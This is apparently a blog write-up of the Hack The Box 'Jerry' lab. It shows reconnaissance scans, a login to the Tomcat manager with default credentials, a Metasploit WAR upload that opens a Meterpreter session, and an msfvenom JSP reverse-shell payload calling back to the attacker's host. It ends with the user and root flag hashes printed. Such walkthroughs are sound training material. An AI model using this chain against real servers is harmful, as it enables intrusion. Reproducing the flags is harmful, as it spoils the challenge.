HTB Jerry

$nmap -A -T4 -p- -sV -Pn 10.10.10.95

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-25 19:07 CEST
Nmap scan report for 10.10.10.95
Host is up (0.043s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.29 seconds

$gobuster dir -u http://10.10.10.95:8080 -w /usr/share/wordlists/dirb/common.txt -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.95:8080
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/06/28 12:43:43 Starting gobuster
===============================================================
http://10.10.10.95:8080/aux (Status: 200)
http://10.10.10.95:8080/cmd (Status: 302)
http://10.10.10.95:8080/com1 (Status: 200)
http://10.10.10.95:8080/com2 (Status: 200)
http://10.10.10.95:8080/com3 (Status: 200)
http://10.10.10.95:8080/con (Status: 200)
http://10.10.10.95:8080/docs (Status: 302)
http://10.10.10.95:8080/examples (Status: 302)
http://10.10.10.95:8080/favicon.ico (Status: 200)
http://10.10.10.95:8080/host-manager (Status: 302)
http://10.10.10.95:8080/lpt2 (Status: 200)
http://10.10.10.95:8080/lpt1 (Status: 200)
http://10.10.10.95:8080/manager (Status: 302)
http://10.10.10.95:8080/nul (Status: 200)
http://10.10.10.95:8080/prn (Status: 200)
http://10.10.10.95:8080/shell (Status: 302)
===============================================================
2020/06/28 12:44:04 Finished
===============================================================

$nikto -h 10.10.10.95:8080

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.95
+ Target Hostname:    10.10.10.95
+ Target Port:        8080
+ Start Time:         2020-06-28 12:45:28 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 's3cret'). Apache Tomcat.
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /manager/status: Tomcat Server Status interface found (pass protected)
+ 7967 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2020-06-28 12:51:58 (GMT2) (390 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Access to http://10.10.10.95:8080/manager/html 

Use credentials found on Nikto’s results (tomcat/s3cret)

As we can observe, we are able to upload and deploy a WAR file.

msf5 > use exploit/multi/http/tomcat_mgr_upload
msf5 exploit(multi/http/tomcat_mgr_upload) > options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password for the specified username
   HttpUsername                   no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Java Universal

msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret

HttpPassword => s3cret

msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat

HttpUsername => tomcat

msf5 exploit(multi/http/tomcat_mgr_upload) > set rhost 10.10.10.95

rhost => 10.10.10.95

msf5 exploit(multi/http/tomcat_mgr_upload) > set rport 8080

rport => 8080

msf5 exploit(multi/http/tomcat_mgr_upload) > exploit 

[*] Started reverse TCP handler on 10.10.14.6:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying SgSC1ks...
[*] Executing SgSC1ks...
[*] Undeploying SgSC1ks ...
[*] Sending stage (53904 bytes) to 10.10.10.95
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.95:49193) at 2020-06-28 16:52:32 +0200

meterpreter >

meterpreter > sysinfo

Computer    : JERRY
OS          : Windows Server 2012 R2 6.3 (amd64)
Meterpreter : java/windows

meterpreter > run post/multi/recon/local_exploit_suggester 

[*] 10.10.10.95 - Collecting local exploits for java/windows...
[-] 10.10.10.95 - No suggestions available.
meterpreter >

Let’s try another approach.

$msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.6 lport=9999 -f war -o shell.war

Payload size: 1097 bytes
Final size of war file: 1097 bytes
Saved as: shell.war
War file was upload

Access to http://10.10.10.95:8080/reverse

C:\apache-tomcat-7.0.88>whoami

whoami
nt authority\system

C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>dir

Volume in drive C has no label.
Volume Serial Number is FC2B-E489

Directory of C:\Users\Administrator\Desktop

06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:09 AM    <DIR>          flags
               0 File(s)              0 bytes
               3 Dir(s)  27,600,789,504 bytes free

C:\Users\Administrator\Desktop>cd flags
C:\Users\Administrator\Desktop\flags>dir

Volume in drive C has no label.
Volume Serial Number is FC2B-E489

Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)  27,600,789,504 bytes free

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"

user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *